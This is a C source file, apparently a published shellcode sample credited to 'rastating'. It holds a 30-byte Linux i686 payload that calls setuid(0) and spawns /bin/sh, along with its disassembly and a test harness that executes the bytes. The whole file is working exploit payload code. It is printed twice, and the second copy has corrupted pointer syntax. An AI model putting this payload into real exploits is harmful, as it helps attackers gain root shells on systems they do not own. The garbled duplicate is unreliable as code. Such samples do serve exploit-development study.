rastating/setuid_execve_shell.c

## setuid_execve_shell.c
/*
Title   : Linux i686 setuid(0) execve shell (30 bytes)
Author  : rastating

08048060 <_start>:
 8048060:	31 db                	xor    %ebx,%ebx
 8048062:	8d 43 17             	lea    0x17(%ebx),%eax
 8048065:	cd 80                	int    $0x80
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	31 d2                	xor    %edx,%edx
 804806b:	52                   	push   %edx
 804806c:	68 2f 2f 73 68       	push   $0x68732f2f
 8048071:	68 2f 62 69 6e       	push   $0x6e69622f
 8048076:	8d 1c 24             	lea    (%esp),%ebx
 8048079:	8d 41 0b             	lea    0xb(%ecx),%eax
 804807c:	cd 80                	int    $0x80
*/

#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned char code[] =
        "\x31\xdb\x8d\x43\x17\xcd\x80\x31"
        "\xc9\x31\xd2\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x8d\x1c"
        "\x24\x8d\x41\x0b\xcd\x80";

    printf("Shellcode length: %d\n", strlen(code));

    void (*s)() = (void *)code;
    s();

    return 0;
}
	/*
	Title : Linux i686 setuid(0) execve shell (30 bytes)
	Author : rastating

	08048060 <_start>:
	8048060: 31 db xor %ebx,%ebx
	8048062: 8d 43 17 lea 0x17(%ebx),%eax
	8048065: cd 80 int $0x80
	8048067: 31 c9 xor %ecx,%ecx
	8048069: 31 d2 xor %edx,%edx
	804806b: 52 push %edx
	804806c: 68 2f 2f 73 68 push $0x68732f2f
	8048071: 68 2f 62 69 6e push $0x6e69622f
	8048076: 8d 1c 24 lea (%esp),%ebx
	8048079: 8d 41 0b lea 0xb(%ecx),%eax
	804807c: cd 80 int $0x80
	*/

	#include <stdio.h>
	#include <string.h>

	int main(void)
	{
	unsigned char code[] =
	"\x31\xdb\x8d\x43\x17\xcd\x80\x31"
	"\xc9\x31\xd2\x52\x68\x2f\x2f\x73"
	"\x68\x68\x2f\x62\x69\x6e\x8d\x1c"
	"\x24\x8d\x41\x0b\xcd\x80";

	printf("Shellcode length: %d\n", strlen(code));

	void (s)() = (void )code;
	s();

	return 0;
	}